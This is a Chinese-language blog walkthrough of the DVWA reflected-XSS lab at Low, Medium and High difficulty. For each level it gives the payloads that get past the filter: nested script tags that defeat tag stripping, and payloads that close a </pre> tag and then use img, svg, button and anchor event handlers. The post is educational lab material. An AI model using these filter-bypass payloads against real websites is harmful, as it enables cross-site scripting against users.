DVWA-XSS(Reflected)注入-Low-Medium-Hight

article/2023/6/4 15:05:19


Low


1、看到这里,这个输入框就是“入口”,输入探测123“出口”的位置

2、直接上payload:   <script>alert(1)</script> 

3、结果:

4、这里我们可以去查看一下源码的结构,已经成功插入了一个<script>标签


Medium


1、话不多说,直接勒特  <script>alert(1)</script>  从源代码中苦于看到  <script>被吃了一半

 

2、不要慌,喜欢吃就多给它一个<script><script>alert(1)</script>

3、从结果中看到被它挨个吃了!!而且吃头不吃尾巴!,那就把他们混起来给他吃<scr<script>ipt>alert(1)</script>,

4、我们来看一下原代码 :这会儿吃撑了,吐了一个出来,通关~


Hight


1、勒特:<script>alert(1)</script>    这次吃得干干净净

2、这个时候,你会发现,怎么塞它都给你吐一个 “>” 出来!说明得换个方法

思路——很能吃,是个无底洞,所以得把它封起 !  </pre>  让它的嘴闭起来 

 3、尝试:上马桶塞堵嘴    </pre> 堵嘴  <!--

从前后端的代码看,似乎是堵住了。

  • </pre>这个标签是与前面的形成闭合
  • <!--  这个马桶塞是注释后面多余的代码,不用也可!

 4、好了,上才艺:

</pre> <img src='1' οnclick='alert(1)'><!--

</pre> <svg src='1' οnlοad='alert(1)'><!--

</pre><button οnclick='alert(1)'>老六</button><!--

</pre><a href='1' οnclick='alert(1)'>老六</a><!--

花式通关

 


https://www.dgrt.cn/a/392014.html

相关文章

叶尖速比与风力利用系数之间的关系曲线(代码)

风力发电机功率与物理参数之间的关系为&#xff1a;Cp为风能利用系数&#xff0c;是桨距角 与叶尖速比 的函数&#xff0c;具体的关系可表示为&#xff1a;根据上述公式&#xff0c;叶尖速比与风力利用系数之间的规律如图所示。可见&#xff0c;每一个确定的桨距角&#xff0c…

每天10个前端小知识 【Day 5】

前端面试基础知识题 1. typeof 与 instanceof 有什么区别 typeof与instanceof都是判断数据类型的方法&#xff0c;区别如下&#xff1a; typeof会返回一个变量的基本类型&#xff0c;instanceof返回的是一个布尔值。instanceof 可以准确地判断复杂引用数据类型&#xff0c;但…

借壳上市 - 打造企业上市系列文章

借壳上市是一个金融术语&#xff0c;指一家母公司(集团公司)通过把资产注入一家市值较低的已上市公司(壳&#xff0c;Shell)&#xff0c;得到该公司一定程度的控股权&#xff0c;利用其上市公司地位&#xff0c;使母公司的资产得以上市。通常该壳公司会被改名。借壳上市借壳上市…

Java多线程相关问题

多线程多线程概念&#xff1f;多线程是指程序中包含多个执行单位&#xff0c;即在一个程序中可以同时运行多个不同的线程来执行不同的任务&#xff0c;也就是说允许单个程序创建多个并行执行的线程来完成各自的任务。多线程的优缺点&#xff1f;竞用共享资源一直是让人头疼的问…

阿里面试官:如何给所有的async函数添加try/catch?

前言大厂面试题分享 面试题库前端面试题库 &#xff08;面试必备&#xff09; 推荐&#xff1a;★★★★★地址&#xff1a;前端面试题库三面的时候被问到了这个问题&#xff0c;当时思路虽然正确&#xff0c;可惜表述的不够清晰后来花了一些时间整理了下思路&#xff0c;那么如…

Linux多线程---线程概念和线程控制

线程概念什么是线程&#xff1f;CPU视角&#xff1a;与进程的关系&#xff1a;Linux下线程概念那么CPU能分辨task_struct是进程和线程吗&#xff1f;理解页表为何以多级页表实现&#xff1f;多级页表是如何实现的&#xff1f;多级页表的优点多线程的特点优点缺点线程异常线程用…

android开发技巧杂谈

android开发技巧一 android的一些常用包是发布在国外的&#xff0c;所以一些包&#xff0c;我们下载不下来&#xff0c;我们可以使用阿里云的镜像地址(maven { url https://maven.aliyun.com/nexus/content/groups/public/ })。 使用https的地址&#xff0c;如下(亲测可用)&…

【计算机视觉】Openvino给yolov5目标检测提速实战

1.摘要 目标检测是计算机视觉主要应用方向之一。目标检测通常包括两方面的工作&#xff0c;首先是找到目标&#xff0c;然后就是识别目标。常用的目标检测方法分为两大流派&#xff1a;一步走&#xff08;one_stage&#xff09;算法&#xff1a;直接对输入的图像应用算法并输出…